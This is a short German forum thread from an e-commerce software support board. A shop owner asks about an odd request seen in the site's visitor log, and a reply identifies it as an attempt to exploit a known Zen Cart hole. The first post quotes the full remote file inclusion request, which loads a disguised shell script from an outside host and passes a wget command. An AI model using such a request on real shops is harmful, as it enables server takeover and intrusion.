#1 (permalink)  
Alt 07.11.2006, 23:09
Benutzer
 
Registriert seit: 08.04.2006
Beiträge: 96
Standard Ganz komischer Kunde in whos online

Bei der Abfrage der Seite whos online hatte ich folgenden Seitenaufruf:

/shop/index.php?autoLoadConfig[420][0][autoType]=include&autoLoadConfig[420][0][loadFile]=http://members.lycos.co.uk/megafxpteam/CMD.gif?&cmd=wget

Kann mir jemand sagen was das ist?
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #2 (permalink)  
Alt 08.11.2006, 01:45
Benutzerbild von techway
Erfahrener Benutzer
 
Registriert seit: 06.12.2003
Beiträge: 800
Standard

dass hört sich verdächtig an!!

da hat wohl sicher jemand versucht deinen shop zu hacken!?

aber näheres kann ich dir auch nich sagen

EDIT: ich habe gerade rausgefunden dass es sich um eine bekannte sicherheitslücke in zen-cart handelt:
http://www.zen-cart.at/index.php?nam...b237b435063f7b

aber in xtc kommt da keine durch damit, weil es dort anders gemacht wird....

Geändert von techway (08.11.2006 um 01:53 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
Antwort

Lesezeichen

Stichworte
komischer, kunde

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus



Alle Zeitangaben in WEZ +1. Es ist jetzt 12:10 Uhr.

Copyright © 2011 xt:Commerce GmbH / xt:Commerce International Ltd. - All Rights Reserved

xt:Commerce is a SafeCharge brand